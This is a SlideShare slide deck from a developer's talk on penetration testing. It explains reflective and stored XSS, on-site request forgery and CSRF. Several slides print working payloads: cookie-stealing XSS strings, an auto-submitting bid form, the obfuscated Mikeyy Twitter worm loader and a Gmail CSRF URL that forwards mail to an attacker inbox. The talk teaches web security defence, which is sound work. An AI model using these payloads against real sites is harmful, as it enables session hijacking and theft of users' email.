Published on

This was a full length talk presented by Amit Dhakkad in vodQA-3 : A QA Meet held in ThoughtWorks, Pune.

Published in: Technology
  • Be the first to comment

  • Be the first to like this

No Downloads
Total views
On SlideShare
From Embeds
Number of Embeds
Embeds 0
No embeds

No notes for slide


  1. 1. AmitDhakad<br />Application Developer<br />Is considered a “survivor”<br />Likes To Read About Black Magic & Illusions<br />
  2. 2. What, why and how’s ofPenetration Testing<br />- AmitDhakad<br />Developer<br />
  3. 3. What do I plan to cover?<br />What is Penetration Testing?<br />XSS<br />What is it?<br />Types of XSS<br />Reflective XSS<br />Stored XSS<br />Request Forgery<br />What is it?<br />Types of Request Forgery<br />On-site request forgery <br />Cross-site request forgery<br />Demo<br />Attack mechanisms<br />Real world examples<br />Why do we need to pay attention?<br />
  4. 4. Penetration Testing<br />Simulating a malicious attack on a system<br />
  5. 5. Cross-site scripting (XSS)<br />Injecting javascript through user-controllable fields<br />
  6. 6. Reflective XSS<br />Injecting javascript using url parameters<br />
  7. 7. Diagram courtesy : The Web Application Hacker’s Handbook<br />
  8. 8. Attack:http://localhost:3000/pure-reflective-xss?query=title"onclick="window.location.href=('http://localhost:3000/log?message='%2Bdocument.cookie)<br />
  9. 9. Stored XSS<br />Exploiting server’s ability to persist<br />
  10. 10. Diagram courtesy : The Web Application Hacker’s Handbook<br />
  11. 11. Attack:Image url is set tohttp://www.myflorida.org.uk/images/disney_gif/Donald.gif"onmouseover="window.location.href=('http://localhost:3000/log?message='+document.cookie)<br />
  12. 12. Request Forgery<br />Perform unwitting actions on behalf of the user<br />
  13. 13. On-site Request Forgery (OSRF)<br />From same domain<br />
  14. 14. Attack with XSS:Image url is set tohttp://www.myflorida.org.uk/images/disney_gif/Donald.gif“ onmouseover="var form=document.getElementById('new_bid'); form.bid_amount.value=100;form.submit();<br />
  15. 15. Attack without XSS:Image url is set to /bids?bid[amount]=500&bid[auction_id]=1<br />
  16. 16. Cross-site Request Forgery (CSRF)<br />From a different domain<br />
  17. 17. Same origin policy<br />A page residing on one domain can cause an arbitrary request to be made to another domain, but it cannot itself process the data returned from that request.<br />A page residing on one domain can load a script from another domain and execute this within its own context.<br />
  18. 18. What can you do with XSS and Request Forgery?<br />Session hijacking<br />Performing arbitrary actions<br />Disclosure of user data<br />
  19. 19. Real world attacks<br />
  20. 20. MySpace worm by Samy (XSS + OSRF)<br />Bypassed all filters and added a script to his profile<br />The script did two things:<br />Added the visiting user as a friend<br />The script got copied into the user’s profile<br />Anyone visiting the new infected user also got added as Samy’s friend.<br />
  21. 21. <ul><li>Protection:
  22. 22. MySpace strips out the word "onreadystatechange" which is necessary for XML-HTTP requests
  23. 23. Attack:
  24. 24. eval('xmlhttp.onread' + 'ystatechange = callback');</li></li></ul><li>Ebay – discovered by Dave Armstrong (OSRF)<br />Crafted url set as image url<br />Arbitrary bid was placed on behalf of the visiting user<br />
  25. 25. Mikeyy twitter worm (XSS + OSRF)<br />Implemented by a 17-year old boy<br />"><title><script>document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,115,116,97,108,107,100,97,105,108,121,46,99,111,109,47,97,106,97,120,46,106,115,34,62,60,47,115,99,114,105,112,116,62));</script><br />-- "<script src="http://www.stalkdaily.com/ajax.js"></script>"<br />Visiting user got infected<br />Infected users began twitting unwittingly.<br />
  26. 26. Gmail vulnerability – discovered by PetkoPetkov (CSRF)<br />http://www.gnucitizen.org/util/csrf?_method=POST&_enctype=multipart/form-data&_action=https%3A//mail.google.com/mail/h/ewt1jmuj4ddv/%3Fv%3Dprf&cf2_emc=true&cf2_email=evilinbox@mailinator.com&cf1_from&cf1_to&cf1_subj&cf1_has&cf1_hasnot&cf1_attach=true&tfi&s=z&irf=on&nvp_bu_cftb=Create%20Filter<br />Add filter to forward all emails to the attacker’s email address<br />
  27. 27. Why we need to pay attention?<br />Shift is towards attacking clients<br />Technologies don’t provide strong protection<br />Considered as lame attacks<br />Identification using automated tools is difficult<br />Penetration testing is considered as a separate vertical<br />
  28. 28. Break your own walls before anyone else does it<br />
  29. 29. Q & A<br />
  30. 30. Thank you<br />